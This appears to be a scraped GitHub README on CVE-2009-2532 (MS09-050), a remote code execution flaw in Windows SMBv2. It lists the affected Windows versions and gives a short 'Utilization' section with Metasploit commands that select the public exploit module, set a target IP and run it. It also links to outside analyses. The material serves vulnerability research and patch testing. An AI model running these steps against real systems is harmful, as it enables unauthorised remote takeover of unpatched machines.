CVE-2009-2532

Describe

Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC do not properly process the command value in an SMB Multi-Protocol Negotiate Request packet, which allows remote attackers to execute arbitrary code via a crafted SMBv2 packet to the Server service, aka "SMBv2 Command Value Vulnerability."

ImpactVersion

Product	CPU Architecture	Update	Tested
Windows Server 2008	X64/X86	SP2	✔
Windows Server 2008	X86/X64
Windows Vista		SP1
Windows Vista		SP2
Windows Vista

Utilization

use MSF Test system Windows Server 2008 SP2 x86

use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.1.13 #目标IP
run

Analyze

https://www.giantbranch.cn/2017/08/26/Educatedscholar%E5%88%A9%E7%94%A8%E7%9A%84%E6%BC%8F%E6%B4%9Ems09-050%E5%88%86%E6%9E%90%E5%8F%8A%E5%85%B6%E5%88%A9%E7%94%A8%E7%9A%84shellcode%E5%88%86%E6%9E%90%E5%8F%8A%E4%B8%8Emsf%E5%88%A9%E7%94%A8%E5%AF%B9%E6%AF%94/
https://zhuanlan.zhihu.com/p/27155431

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README_EN.md

README_EN.md

CVE-2009-2532

Describe

ImpactVersion

Utilization

Analyze

Files

README_EN.md

Latest commit

History

README_EN.md

File metadata and controls

CVE-2009-2532

Describe

ImpactVersion

Utilization

Analyze